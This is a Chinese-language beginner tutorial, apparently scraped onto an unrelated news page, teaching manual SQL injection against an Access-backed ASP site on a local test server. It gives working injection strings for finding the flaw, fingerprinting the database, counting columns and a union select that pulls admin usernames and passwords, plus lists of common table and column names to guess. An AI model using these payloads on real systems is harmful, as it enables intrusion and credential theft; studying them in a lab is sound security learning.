当前位置：首页 > news >正文

韩韩良品只做性价比网站下载/seo排名赚app靠谱吗

news 2025/8/8 2:40:23

韩韩良品只做性价比网站下载,seo排名赚app靠谱吗,济南做网站的好公司有哪些,动态网站建设教学大纲access数据库简单介绍先来介绍一下这个数据库，Microsoft Office Access，Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和图形用户界面两项特点，是 Microsoft Office 的系统程序之一。优…

access数据库简单介绍

先来介绍一下这个数据库，Microsoft Office Access，Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和图形用户界面两项特点，是 Microsoft Office 的系统程序之一。

优势：提高速度和减少代码量

缺点：当数据库过大时，一般达到100M左右性能就会开始慢慢下降了(比如访问人数过多，过度消耗服务器资源)，安全性能差。

适合人群：小白，初学者了解sql注入，编程人员 (大佬勿喷)

首先是sql注入产生的条件：

1.参数的传递

2.参数值可以带入到数据库

我们这里本地搭建了一个漏洞平台(漏洞源码会附在下面链接的)

第一步找注入点

我这注入点是 http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139

先用 ' 单引号报错如果报错了说明有注入点的可能性

再用

and 1=1 返回正常

and 1=2 返回不正常

返回正常 http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and 1=1

返回不正常 http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and 1=2

第二步我们再来判断一下它的数据类型

and (select count(*) from sysobjects)>0 判断sql server

and (select count(*) from msysobjects)>0 判断access数据库返回不够权限就是access数据库了

我这里判断的是 access数据库

第三步用order by 判断字段数量

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 order by 30

我们这里使用折中猜解法，这里30返回报错，那我们继续下去

这里猜的是22个字段数量

那我们接着继续下去

第四步联合查询

两条语句

union select 长度 from 表

union select 列名 from 表

首先我们长度是22

那我们构成语句

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from 表名

这里表名我们就慢慢自己构造直到出数据所在字段了

常用的表名

admin、a_admin、x_admin、m_admin、adminuser、adminstrator...

我这里猜测的表名是 admin 爆出来了

这里出来的两个字段 3,15 我们继续猜测列名

常用的列名

admin，password,username、admin_name、name、admin_userid、admin_id

我们就猜最常见的吧

http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin

admin放3字段位置上，password放在15字段位置上